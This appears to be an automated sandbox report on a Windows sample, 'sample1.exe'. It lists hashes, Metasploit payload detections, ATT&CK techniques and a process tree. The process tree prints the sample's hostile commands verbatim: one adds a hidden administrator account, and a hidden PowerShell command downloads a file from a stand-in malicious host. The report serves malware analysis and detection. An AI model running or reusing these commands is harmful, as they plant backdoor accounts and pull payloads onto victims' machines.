Analysis

  • max time kernel
    118s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    01-06-2024 17:35

General

  • Target

    sample1.exe

  • Size

    83KB

  • MD5

    dec37e4b834cf3a9a78475fec06255db

  • SHA1

    bc6a9f3dd99e40dfe34ba8c64401027a3d86d2bc

  • SHA256

    075a8576bb2f75bf56cfa8c88727011ac66f176ca5abe2a78978c556577e5058

  • SHA512

    8402a9206285014fe6ab3752433835a7f907406d2c5fb23204a567d3f9940c844578ee525c64b6a67d81bf0983e7d3972fb2380d822cc9fd08eec098749d4a77

  • SSDEEP

    1536:Icus7AQXjNta73Jah9UFBD3JMb+KR0Nc8QsJq3Gnq3+/q3DlHq3/:lAYhta7ouJe0Nc8QsCzDDm/

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://web.danger.mal/danger

Extracted

Family

metasploit

Version

windows/exec

Extracted

Family

metasploit

Version

windows/shell_bind_tcp

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sample1.exe
    "C:\Users\Admin\AppData\Local\Temp\sample1.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1636
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c net user TestUser S3cret^S3cret /ADD && net localgroup Administrators TestUser /ADD
      2⤵
        PID:2388
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -ExecutionPolicy bypass -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('http://web.danger.mal/danger','C:/danger')"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1904

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1636-0-0x0000000000400000-0x000000000041B1FC-memory.dmp
      Filesize

      108KB

    • memory/1636-1-0x0000000000220000-0x0000000000221000-memory.dmp
      Filesize

      4KB

    • memory/1636-2-0x0000000000400000-0x000000000041B1FC-memory.dmp
      Filesize

      108KB

    • memory/1904-5-0x0000000073E91000-0x0000000073E92000-memory.dmp
      Filesize

      4KB

    • memory/1904-6-0x0000000073E90000-0x000000007443B000-memory.dmp
      Filesize

      5.7MB

    • memory/1904-7-0x0000000073E90000-0x000000007443B000-memory.dmp
      Filesize

      5.7MB

    • memory/1904-8-0x0000000073E90000-0x000000007443B000-memory.dmp
      Filesize

      5.7MB

    • memory/1904-9-0x0000000073E90000-0x000000007443B000-memory.dmp
      Filesize

      5.7MB

    • memory/1904-10-0x0000000073E90000-0x000000007443B000-memory.dmp
      Filesize

      5.7MB